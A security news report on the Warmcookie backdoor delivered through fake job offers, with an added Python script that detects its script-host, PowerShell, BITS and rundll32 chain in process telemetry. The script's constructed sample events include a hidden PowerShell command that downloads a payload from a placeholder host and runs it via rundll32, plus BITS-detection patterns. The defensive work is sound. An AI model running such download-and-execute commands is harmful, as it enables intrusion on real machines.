New Warmcookie Windows backdoor pushed via fake job offers (Security News, June 2024)
A never-before-seen Windows malware named 'Warmcookie' is distributed through fake job offer phishing campaigns to breach corporate networks.
According to Elastic Security Labs, which discovered the new threat, Warmcookie is capable of extensive machine fingerprinting, screenshot capturing, and the deployment of additional payloads.
The phishing campaign utilizes fake job and recruitment offers sent via emails with attention-grabbing subjects.
When executed, the JS script launches a PowerShell script that uses the Background Intelligent Transfer Service (BITS) to download the Warmcookie DLL file from a specified URL and then executes it via rundll32.
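The delivery chain just described (script host, then PowerShell, then a BITS transfer, then rundll32 loading the dropped DLL) is a parent/child process pattern a defender can look for in endpoint telemetry. The following is an added example, not code from Elastic Security Labs or from this article: it runs a small set of detection rules over constructed process-creation events whose field names follow the Sysmon Event ID 1 layout (ParentImage, Image, CommandLine). The URL, file paths and the DLL export name in the sample events are constructed placeholders, not indicators from the report.

```python
"""Detect a script-host -> PowerShell -> BITS -> rundll32 delivery chain
over process-creation events.

Added example, not the article's or Elastic's code. Event fields mirror
Sysmon Event ID 1 names; every sample event below is constructed.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional, Tuple

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Command-line forms that invoke BITS from PowerShell or cmd.
BITS_RE = re.compile(r"start-bitstransfer|bitsadmin(\.exe)?\s+/transfer", re.IGNORECASE)

# rundll32 loading a DLL from a user-writable directory is far rarer than
# loading one from System32, so it is a useful second stage signal.
USER_WRITABLE_RE = re.compile(
    r"\\(users\\[^\\]+\\appdata|programdata|windows\\temp)\\", re.IGNORECASE
)


@dataclass(frozen=True)
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


def _basename(path: str) -> str:
    """Return the lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(evt: ProcessEvent) -> Optional[Tuple[str, str]]:
    """Return (rule name, severity) if the event matches a chain stage, else None."""
    parent, child = _basename(evt.parent_image), _basename(evt.image)

    # Stage 1/2: a JS/VBS host spawning PowerShell, worse if it pulls a file via BITS.
    if parent in SCRIPT_HOSTS and child in POWERSHELL:
        if BITS_RE.search(evt.command_line):
            return ("script-host-powershell-bits-download", "high")
        return ("script-host-spawned-powershell", "medium")

    # Stage 3: PowerShell handing a DLL in a user-writable location to rundll32.
    if parent in POWERSHELL and child == "rundll32.exe" and USER_WRITABLE_RE.search(evt.command_line):
        return ("powershell-rundll32-user-writable-dll", "high")

    return None


def detect(events: Iterable[ProcessEvent]) -> List[Tuple[int, str, str]]:
    """Run classify() over an event stream; return (index, rule, severity) per hit."""
    hits = []
    for idx, evt in enumerate(events):
        match = classify(evt)
        if match is not None:
            hits.append((idx, match[0], match[1]))
    return hits


# Constructed sample telemetry: two benign events, three from a simulated chain.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\wscript.exe",
                 r"wscript.exe C:\Users\alice\Downloads\attachment.js"),
    ProcessEvent(r"C:\Windows\System32\wscript.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe -w hidden -c Start-BitsTransfer -Source "
                 r"http://example.invalid/payload -Destination C:\ProgramData\stage.dll"),
    # Export name "PlaceholderExport" is constructed, not a real Warmcookie export.
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\System32\rundll32.exe",
                 r"rundll32.exe C:\ProgramData\stage.dll,PlaceholderExport"),
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe -File C:\Scripts\backup.ps1"),
    ProcessEvent(r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\rundll32.exe",
                 r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"),
]

if __name__ == "__main__":
    for idx, rule, severity in detect(SAMPLE_EVENTS):
        print(f"event {idx}: {rule} [{severity}]")
```

The first stage (wscript.exe launching a job-offer script) is deliberately not alerted on by itself, since script hosts opening downloaded files is common; the rules fire on the parent/child relationship plus the BITS or user-writable-DLL detail, which is what makes this chain distinctive and keeps the benign backup script and the System32 rundll32 call quiet.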
Warmcookie is a backdoor malware with various capabilities designed to infiltrate, persist, and gather intelligence from victim systems.
Elastic's analysts comment that despite Warmcookie being a new backdoor with plenty of room for improvement, it is already entirely capable of inflicting significant damage to its targets, especially given its capability to introduce additional payloads.